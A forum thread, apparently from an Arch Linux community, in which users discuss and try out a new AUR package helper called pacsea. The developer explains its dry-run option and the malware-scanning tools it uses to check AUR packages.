gotta assume arch does a cve scan before releasing an update.yours would be a ‘post’ or ‘during’ package scan? The snark in me wants to say overkill but in reality no one would turn down extra security. Interesting.
Even after the github introduction it resembles pacseek.
I like the pkgbuild dealio.
compared to yay and pacseek we can do a lot of these things save a couple…
what about a dry run? that might be interesting.
My hats off to all creators/creatives ( ) may check it out.
As not listed here, a Dry-run is partially implemented (Full implementation planned). As it is more thought of a tool for development dry-run is implemented as an option flag ‘–dry-run’. At the moment the dry-run is only implemented for install/remove packages.
As the AUR is “User maintained” it does not have any checks for new packages. As I am also a new maintainer of packages the only thing that is somewhat of a savety check is the Voting system. And User looking at the PKGBUILD’s.
The problem with this approach is that most of the AUR packages are not voted for (For whatever reason). I think a download counter would also help with security, as you can also look out for downloads, but this also could be manipulated.
I think it is a though situation overall. And as a heavy AUR user myself I want to do something about it. If it’s effective or not, I don’t know yet.
I am no security expert and I am learning each day new ways that may improve the situation, but also have to discard many ideas as they are not effective for the most common malware attack onto the AUR. As a matter of fact I implemented the first tools: ClamAV, TotalVirus, Shellcheck, Trivy and Semgrep-bin, but as I explored the tools further, only shellcheck may be effective for Zero day malware.
ClamAV and TotalVirus are used more for known virus.
there search for the package and press either enter to directly remove it. Preflight will be opened, if set and in the preflight you will have the keybind as mentioned
Of course I am still working on bugfixes and security issues that pop up. In terms of features, there will be less, as I am quite happy with the current state.
I will of course look at suggestions by the community and I also have some things that I want to implement, but I am also in university and need to priorities my life
I gave it a spin today. Interesting window layout. I wanted to see if I could install ‘Openshot-bin’ from AUR. It took about 2 hours after installing and compiling dependencies it needed. In the end it said it was completed successfully. Upon running the program it didn’t initialize. . . .just seeing the bouncing icon attempt to initialize. I’ve got the latest appimage version installed and it works. Keep up the work . . . I’m sure when you get all worked out it’ll be a fine package installer. Just my two-cents. . . . Writing programs can’t be too easy of a task realizing all of the complexities involved.
You could be very right about a pkgbuild in AUR. I have both yay and paru installed on my computers. I actually tried yay in an earlier attempt and it was taking forever to compile the program dependencies. So I thought I would give pacsea a try to see what the ‘final’ outcome would give me. It in the end stated it had successfully completed the installation. What I got when I clicked the program icon to activate it was just a ‘bouncing’ icon which then it just disappeared. Don’t take this in a negative way. . . . your programming skills must be exceptionable. It’s not an easy task to write software in my opinion. Don’t give up the fight. . . . I liked what I see. . . . it’s definitely a excellent start.
) may check it out.
